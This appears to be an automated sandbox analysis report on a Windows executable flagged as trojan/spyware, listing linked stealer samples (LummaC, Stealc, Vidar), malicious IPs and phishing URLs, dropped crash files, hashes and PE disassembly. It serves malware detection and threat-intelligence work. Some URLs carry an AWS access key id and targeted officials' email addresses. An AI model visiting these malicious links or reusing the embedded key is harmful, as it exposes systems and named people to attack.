                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 0
                                                                                                                                            • Number of non-executed functions: 2
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.107.246.63, 20.109.210.53, 40.126.53.14
                                                                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Execution Graph export aborted for target Yh6fS6qfTE.exe, PID 7200 because there are no executed function
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                            TimeTypeDescription
                                                                                                                                            02:04:09API Interceptor24x Sleep call for process: Yh6fS6qfTE.exe modified
                                                                                                                                            02:05:03API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            104.21.36.201ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                              skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                185.166.143.50file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                  V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                                                                    GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                        pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                  lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    observerfry.latU8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 172.67.199.72
                                                                                                                                                                    ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    bitbucket.org5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                    EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                    fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                    V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                    s3-w.us-east-1.amazonaws.com5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 52.217.203.57
                                                                                                                                                                    TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 3.5.16.86
                                                                                                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 16.182.37.145
                                                                                                                                                                    EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 52.216.41.233
                                                                                                                                                                    https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                    • 52.217.128.241
                                                                                                                                                                    https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                    • 52.216.142.68
                                                                                                                                                                    https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 54.231.135.57
                                                                                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                    • 54.231.224.185
                                                                                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                    • 52.217.32.148
                                                                                                                                                                    https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445Get hashmaliciousKnowBe4Browse
                                                                                                                                                                    • 3.5.25.98
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    AMAZON-02USarmv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 54.203.164.5
                                                                                                                                                                    5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 52.217.203.57
                                                                                                                                                                    TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                    EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 54.171.230.55
                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    • 108.139.47.92
                                                                                                                                                                    https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 65.9.112.70
                                                                                                                                                                    https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 108.158.71.175
                                                                                                                                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 64.252.106.176
                                                                                                                                                                    AMAZON-02USarmv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 54.203.164.5
                                                                                                                                                                    5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 52.217.203.57
                                                                                                                                                                    TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                    EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 54.171.230.55
                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    • 108.139.47.92
                                                                                                                                                                    https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 65.9.112.70
                                                                                                                                                                    https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 108.158.71.175
                                                                                                                                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 64.252.106.176
                                                                                                                                                                    CLOUDFLARENETUSU8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 172.67.199.72
                                                                                                                                                                    ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                    pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                    xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                    schost.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    • 104.21.6.116
                                                                                                                                                                    5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                    s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                    TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    spoolsv.COM.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    schost.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    • 104.21.36.201
                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                    No context
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):1.042952103108884
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:9CFTz5nbszcskMhroI7JfpQXIDcQvc6QcEVcw3cE/C36+HbHg/8BRTf3Oy1oVazN:0hGcH0BU/gjudxQfzuiFDZ24IO8e
                                                                                                                                                                    MD5:2CE7FFA406F51B94950CB258C58B8BEB
                                                                                                                                                                    SHA1:9900AEA81D59F0B6F70D19CE7E58A614B870BF17
                                                                                                                                                                    SHA-256:7E4B0DEBE436D44BB6279200DC96C72B49DADD9A7502EE54084E3738907F4E62
                                                                                                                                                                    SHA-512:D49722D55069FB34A3A6A3BBB5D87418E01F89BEB138AA3A3809B3BFF3479016F1C76C7534C9F89C8C2DAD9558770C95736881E30E27567844B23DD42949FE80
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.1.0.7.7.5.3.0.2.5.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.1.0.7.8.2.0.2.1.5.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.7.e.9.5.9.5.-.5.3.9.2.-.4.2.f.4.-.8.c.4.9.-.9.6.8.3.2.a.4.d.1.a.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.7.9.0.b.5.4.-.3.9.9.2.-.4.5.e.a.-.b.c.2.0.-.a.9.1.a.8.9.8.3.4.d.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.h.6.f.S.6.q.f.T.E...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.2.0.-.0.0.0.1.-.0.0.1.3.-.8.0.6.f.-.6.d.d.a.0.8.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.e.f.c.6.7.8.d.b.0.3.0.9.6.7.7.c.8.2.0.0.4.6.4.d.d.f.8.8.7.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.4.4.6.8.6.6.c.c.f.a.5.1.b.2.e.7.f.8.d.3.7.d.6.d.7.0.3.e.d.6.6.0.b.a.4.0.8.d.f.0.!.Y.h.6.f.S.6.q.f.T.E...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 07:04:37 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):283866
                                                                                                                                                                    Entropy (8bit):1.5107539918415762
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:T5iYgBB5ZqQx1zlwKVI00T+DFGrp2Ls18EOWR/wC:T5iYIrLqKWH+FSpGo8EOWRYC
                                                                                                                                                                    MD5:CFADA3D439FA1E9FDB11305B9A010D63
                                                                                                                                                                    SHA1:DAD2FFF2732EF966EA8B744796F036FFAD0FDBD3
                                                                                                                                                                    SHA-256:A22A7A0BDE01422B85E9F6F2658E2418197964241B6A09DB8FE8867D1381F7A5
                                                                                                                                                                    SHA-512:FBB11FAE186F04CE1698B9BC04A3EA90262B79413ECD44AA7998DF946BB5317FC7F50F96BE8820D0529822356858C74E7F62B5DBA638C2E698FE20AEF1DDF526
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MDMP..a..... .........ig....................................,....'......................`.......8...........T...........PL...............(...........*..............................................................................eJ......H+......GenuineIntel............T....... ...e.ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8382
                                                                                                                                                                    Entropy (8bit):3.7081590239983093
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l7wVeJ2A6w6YW7SUK0JygmfNYprC89bDKsfWgBm:R6lXJ56w6YaSUKgmfN+DpfWb
                                                                                                                                                                    MD5:5757C10B458CBD5BC3FDBD300706A4F4
                                                                                                                                                                    SHA1:019EE156C39D11625FB45DAB7D5685DE50AFB462
                                                                                                                                                                    SHA-256:1A0551230DD0D705535B906B4B0ADC34D2C9931A7064EE07DCC36A0CD79E8A4E
                                                                                                                                                                    SHA-512:3F20BED29A312E8CA2705E6E562CFF9CF3F36CF6B30E3AF336EB5ACB19802D742F1D002438B214E68E4DF99CBC362823486A12B2B94859710C647204FD86A78D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.0.0.<./.P.i.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4624
                                                                                                                                                                    Entropy (8bit):4.50912053200728
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwWl8zsnrJg77aI94LWpW8VYEYm8M4JhKcFatj+q8A6Sq90A2zUfd:uIjfnFI7+67VUJs/qz2zUfd
                                                                                                                                                                    MD5:4C12345AACEEE1A63469BAD0F8D62EC1
                                                                                                                                                                    SHA1:7FCBC62CF04EBBA499AD79829E184AB042B050C2
                                                                                                                                                                    SHA-256:4BF14ADA003B3B8A3207E7E26CA8CF5985601BFE5C6F27425976FEFB3FFADBF5
                                                                                                                                                                    SHA-512:13A9275DD1BCB2749B9CF86A7A5548AE17FFF4FB43CFB385257168C29174E9E9E4F13427AA395AF8E371DC4FD648F853487F502F2DE35D28D4F76C957DF4BA1D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643567" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                    Entropy (8bit):4.296002406741097
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:741fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+yimBMZJh1VjE:01/YCW2AoQ0NisiwMHrVA
                                                                                                                                                                    MD5:50705802C345C76331B785EA4BB41255
                                                                                                                                                                    SHA1:238832A8E317E1211BD04599C54745FE3A816A8D
                                                                                                                                                                    SHA-256:B7C902B3705A2B1785E509325B549DA0185F04C43B5FFA4D280E5B3F416C758F
                                                                                                                                                                    SHA-512:000E47B4537696A28C15A4AF39F9239D494A8F3B70DDAD9CF2D861FA8A0D5E82CD05C4CB6D383108C8421447789E55BB5043817204B6243DCEAD5A00B81B33D9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....U..............................................................................................................................................................................................................................................................................................................................................D[..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):6.575118330905334
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:Yh6fS6qfTE.exe
                                                                                                                                                                    File size:2'968'064 bytes
                                                                                                                                                                    MD5:6cb8e80fe23740dff137816a6572a5ba
                                                                                                                                                                    SHA1:446866ccfa51b2e7f8d37d6d703ed660ba408df0
                                                                                                                                                                    SHA256:74d4a3a971e9d7cb7e2a9f3b3c01e7936075aa5c975ee83e54881f53ecff3379
                                                                                                                                                                    SHA512:bbecdfb692df1e64fee92a2c1873f9f7908fc247aad68aacde6d844bf338d947a63f8f7d625e9552d4bac682915ac7025207400eff9aa6937aca82928041719b
                                                                                                                                                                    SSDEEP:49152:J2Fnwq57CzAOFuNHPBvXB7ieIjqN4KeblFyaspcbHFwIT:J2Jwq57CzAOFuNH53VuDJoas+HT
                                                                                                                                                                    TLSH:79D55CD1F50972CBD8CA1A79A52BED825C5E47B4871088D3D86CA47FBEB3CC115BAC24
                                                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. 0...........@..........................P0.......-...@.................................T0..h..
                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                    Entrypoint:0x702000
                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:6
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                    Instruction
                                                                                                                                                                    jmp 00007FD09CED675Ah
                                                                                                                                                                    movaps xmm5, dqword ptr [00000000h]
                                                                                                                                                                    add cl, ch
                                                                                                                                                                    add byte ptr [eax], ah
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
